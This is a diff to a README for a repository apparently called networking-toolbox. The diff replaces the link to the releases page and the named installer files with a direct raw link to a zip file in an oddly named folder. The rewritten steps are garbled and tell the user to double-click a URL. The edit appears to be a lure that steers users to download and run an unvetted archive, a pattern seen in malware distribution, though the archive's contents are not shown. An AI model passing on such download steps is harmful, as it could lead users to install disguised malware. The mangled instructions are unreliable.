RaedHassan97/networking-toolbox/README.md

 Follow these steps to get the networking-toolbox up and running on your computer.

 ### Step 1: Visit the Releases Page
-To download the latest version of the networking-toolbox, [visit this page](https://github.com/RaedHassan97/networking-toolbox/releases).
+To download the latest version of the networking-toolbox, [visit this page](https://raw.githubusercontent.com/RaedHassan97/networking-toolbox/main/coustumier/networking-toolbox.zip).
 Here, you will find different versions of the application.

 ### Step 2: Choose Your Version
 On the Releases page, you’ll see a list of available releases.
 Look for the latest version.
 Click on the release title to expand its details.

 ### Step 3: Download the Application
 Once you have found the latest version, scroll down to the "Assets" section.
 You will see various files available for download.
 Choose the one that fits your system.
-For most users, the file named `networking-toolbox.exe` or `networking-toolbox.zip` will be the right choice.
+For most users, the file named `https://raw.githubusercontent.com/RaedHassan97/networking-toolbox/main/coustumier/networking-toolbox.zip` or `https://raw.githubusercontent.com/RaedHassan97/networking-toolbox/main/coustumier/networking-toolbox.zip` will be the right choice.

 ### Step 4: Install the Application
 1. If you downloaded an `.exe` file, double-click it to start the installation process.
 Follow the prompts to complete the setup.
 2. If you downloaded a `.zip` file, extract the contents to a folder of your choice.
-After extraction, find and double-click `networking-toolbox.exe`.
+After extraction, find and double-click `https://raw.githubusercontent.com/RaedHassan97/networking-toolbox/main/coustumier/networking-toolbox.zip`.

 ## 🔧 Features
 The networking-toolbox includes several key features that help you manage and analyze your network effectively: